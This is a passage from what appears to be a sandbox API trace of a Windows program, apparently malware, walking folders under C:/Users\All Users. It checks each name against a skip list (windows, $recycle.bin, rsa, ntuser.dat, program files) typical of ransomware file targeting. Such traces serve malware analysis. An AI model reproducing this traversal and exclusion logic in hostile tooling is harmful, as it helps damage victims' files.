ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2=".") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="..") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="...") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="windows") returned -1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="$recycle.bin") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="rsa") returned -1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="ntuser.dat") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="programdata") returned -1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="appdata") returned 1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="program files") returned -1 [0147.638] lstrcmpiW (lpString1="Oracle", lpString2="program files (x86)") returned -1 [0147.638] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0147.638] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Oracle" | out: lpString1="C:/Users\\All Users\\Oracle") returned="C:/Users\\All Users\\Oracle" [0147.638] lstrcatW (in: lpString1="C:/Users\\All Users\\Oracle", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Oracle\\") returned="C:/Users\\All Users\\Oracle\\" [0147.638] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Oracle\\" | out: lpString1="C:/Users\\All Users\\Oracle\\") returned="C:/Users\\All Users\\Oracle\\" [0147.638] lstrcatW (in: lpString1="C:/Users\\All Users\\Oracle\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Oracle\\*.*") returned="C:/Users\\All Users\\Oracle\\*.*" [0147.638] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Oracle\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0147.638] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.638] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0147.638] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.638] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.638] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 0 [0147.638] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0147.639] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2=".") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="..") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="...") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="windows") returned -1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="$recycle.bin") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="rsa") returned -1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="ntuser.dat") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="programdata") returned -1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="appdata") returned 1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="program files") returned -1 [0147.639] lstrcmpiW (lpString1="Package Cache", lpString2="program files (x86)") returned -1 [0147.639] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0147.639] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Package Cache" | out: lpString1="C:/Users\\All Users\\Package Cache") returned="C:/Users\\All Users\\Package Cache" [0147.639] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0147.639] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0147.639] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\*.*") returned="C:/Users\\All Users\\Package Cache\\*.*" [0147.639] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0147.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.648] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0147.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.650] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2=".") returned 1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="..") returned 1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="...") returned 1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="windows") returned -1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="$recycle.bin") returned 1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="rsa") returned -1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="ntuser.dat") returned -1 [0147.650] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="programdata") returned -1 [0147.651] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="appdata") returned -1 [0147.651] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="program files") returned -1 [0147.651] lstrcmpiW (lpString1="42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="program files (x86)") returned -1 [0147.651] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0147.651] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460" [0147.651] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\" [0147.651] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\" [0147.651] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" [0147.651] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0147.651] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.651] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0147.651] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.651] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.651] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0147.651] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0147.651] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0147.651] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0147.652] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0147.652] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\" [0147.652] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0147.652] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\" [0147.652] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\" [0147.652] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" [0147.652] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.652] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.652] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.652] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.652] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.652] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9c009a, dwReserved1=0x295e370, cFileName="Patch", cAlternateFileName="")) returned 1 [0147.652] lstrcmpiW (lpString1="Patch", lpString2=".") returned 1 [0147.652] lstrcmpiW (lpString1="Patch", lpString2="..") returned 1 [0147.652] lstrcmpiW (lpString1="Patch", lpString2="...") returned 1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="windows") returned -1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="$recycle.bin") returned 1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="rsa") returned -1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="ntuser.dat") returned 1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="programdata") returned -1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="appdata") returned 1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="program files") returned -1 [0147.653] lstrcmpiW (lpString1="Patch", lpString2="program files (x86)") returned -1 [0147.653] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\" [0147.653] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\", lpString2="Patch" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch" [0147.653] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\" [0147.653] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\" [0147.653] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*" [0147.653] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.653] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.653] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.653] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.653] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295dcf0, cFileName="x64", cAlternateFileName="")) returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2=".") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="..") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="...") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="windows") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="$recycle.bin") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="rsa") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="ntuser.dat") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="programdata") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="appdata") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="program files") returned 1 [0147.654] lstrcmpiW (lpString1="x64", lpString2="program files (x86)") returned 1 [0147.654] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\" [0147.654] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\", lpString2="x64" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64" [0147.654] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\" [0147.654] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\" [0147.654] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*") returned="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*" [0147.654] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName=".", cAlternateFileName="")) returned 0x544790 [0147.654] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.654] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="..", cAlternateFileName="")) returned 1 [0147.654] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.654] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.654] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0xba00b8, dwReserved1=0x295d670, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0147.654] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".") returned 1 [0147.654] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="..") returned 1 [0147.655] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="...") 